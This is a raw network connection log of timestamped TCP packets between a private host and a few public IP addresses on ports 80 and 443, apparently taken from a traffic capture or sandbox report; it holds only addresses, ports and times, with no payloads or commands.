Jan 9, 2022 18:47:46.675805092 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675817966 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675843954 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675880909 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675908089 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.675920963 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675966978 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.675967932 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.676007032 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.676048040 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.676058054 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.715711117 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.832005978 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.832063913 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.832103014 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.832129955 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.832144022 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.832209110 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.841754913 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.841810942 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.841909885 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851125956 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851186037 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851226091 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851267099 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851277113 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851308107 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851352930 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851355076 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851396084 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851413012 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851437092 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851476908 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851502895 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851516008 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851555109 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851577997 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851593971 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851633072 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851659060 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851671934 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851713896 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851753950 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851758957 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851794004 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851829052 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851835966 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851875067 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851917028 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851922989 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.851947069 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851988077 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.851994038 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852030039 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852068901 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852076054 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852108955 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852128983 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852149010 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852179050 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852219105 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852222919 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852258921 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852284908 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852298975 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852339983 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852358103 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852377892 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852416992 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852432966 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852456093 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852494955 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852511883 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852535009 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852572918 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852596998 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852612972 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852653027 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852669001 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.852689028 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.852737904 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.856230021 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.856286049 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.856364012 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.856389999 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.856426954 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.856486082 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:46.888376951 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:46.934547901 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.004653931 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.004715919 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.004755020 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.004795074 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.004813910 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.004906893 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.014422894 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.014483929 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.014575005 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025424957 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025468111 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025505066 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025544882 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025549889 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025584936 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025624037 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025624990 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025664091 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025684118 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025705099 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025744915 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025768995 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025846958 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025888920 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025901079 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.025930882 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025970936 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.025986910 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026009083 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026047945 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026061058 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026087999 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026125908 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026138067 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026154041 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026192904 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026206970 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026235104 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026274920 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026281118 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026312113 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026352882 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026367903 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026391983 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026428938 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026437044 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026467085 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026504993 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026508093 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026544094 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026583910 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026597977 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026622057 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026660919 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026670933 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026701927 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026738882 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026753902 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026777983 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026815891 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026818991 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026854992 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026894093 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026906967 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.026932001 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.026987076 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.028821945 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.028904915 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.028945923 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.028965950 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.028986931 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.029038906 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.107253075 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.107315063 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.107392073 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177344084 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177402973 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177443981 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177459955 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177484035 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177521944 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177530050 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177561998 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177599907 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177604914 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177639961 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177680016 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177687883 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177717924 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177757025 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177764893 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177797079 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177834988 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177850008 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177875042 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177911997 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177920103 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.177952051 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177990913 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.177999020 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178028107 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178066969 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178075075 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178106070 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178143024 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178157091 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178184032 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178211927 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178246021 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178251028 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178292990 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178308010 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178333044 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178378105 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178384066 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178419113 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178457022 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178472996 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.178498030 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178536892 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.178553104 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.187004089 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.187064886 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.187084913 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199212074 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199260950 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199301004 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199322939 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199350119 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199383020 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199389935 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199429989 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199434042 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199470043 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199508905 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199526072 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199548006 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199588060 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199603081 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199629068 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199665070 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199702978 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199711084 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199743032 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199750900 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199779987 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199819088 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199831963 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199858904 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199898005 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199933052 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.199938059 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.199976921 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.200006962 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.200016022 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.200045109 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:47.200119972 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.200547934 CET	49755	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:47.373085022 CET	80	49755	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:49.271826982 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:49.448885918 CET	80	49760	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:49.448975086 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:49.449064016 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:49.453605890 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:49.625555038 CET	80	49760	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:49.630111933 CET	80	49760	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:50.003618956 CET	80	49760	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:50.003797054 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.423016071 CET	49760	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.471965075 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.601092100 CET	80	49760	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:50.651583910 CET	80	49761	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:50.651702881 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.651777983 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.651798010 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:50.830077887 CET	80	49761	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:50.830113888 CET	80	49761	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:51.209096909 CET	80	49761	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:51.209338903 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.209417105 CET	49761	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.387645960 CET	80	49761	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:51.532298088 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.706687927 CET	80	49767	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:51.707940102 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.708017111 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.711590052 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:51.882348061 CET	80	49767	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:51.885787964 CET	80	49767	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:52.262172937 CET	80	49767	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:52.262262106 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.262391090 CET	49767	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.268980980 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.269026041 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.269118071 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.269928932 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.269953012 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.337181091 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.337286949 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.341186047 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.341201067 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.341414928 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.364830017 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.381751060 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.381864071 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.381942034 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.382181883 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.382201910 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.382235050 CET	49771	443	192.168.2.3	185.233.81.115
Jan 9, 2022 18:47:52.382247925 CET	443	49771	185.233.81.115	192.168.2.3
Jan 9, 2022 18:47:52.410824060 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.436649084 CET	80	49767	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:52.595870018 CET	80	49774	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:52.595972061 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.596065998 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.596142054 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:52.781235933 CET	80	49774	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:52.781290054 CET	80	49774	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:53.161501884 CET	80	49774	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:53.161612034 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.161751986 CET	49774	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.346685886 CET	80	49774	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:53.484659910 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.670739889 CET	80	49781	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:53.670835018 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.670918941 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.670933962 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:53.856909037 CET	80	49781	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:54.238461971 CET	80	49781	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:54.238500118 CET	80	49781	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:54.238565922 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.254049063 CET	49781	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.281667948 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:47:54.299770117 CET	80	49787	54.38.220.85	192.168.2.3
Jan 9, 2022 18:47:54.299913883 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:47:54.299978018 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:47:54.318176985 CET	80	49787	54.38.220.85	192.168.2.3
Jan 9, 2022 18:47:54.318223000 CET	80	49787	54.38.220.85	192.168.2.3
Jan 9, 2022 18:47:54.357384920 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.365195036 CET	49787	80	192.168.2.3	54.38.220.85
Jan 9, 2022 18:47:54.440103054 CET	80	49781	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:54.536674023 CET	80	49788	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:54.536887884 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.536928892 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.536937952 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:54.716191053 CET	80	49788	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.092643976 CET	80	49788	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.092690945 CET	80	49788	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.092833042 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.093070030 CET	49788	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.147281885 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.272245884 CET	80	49788	47.251.44.201	192.168.2.3
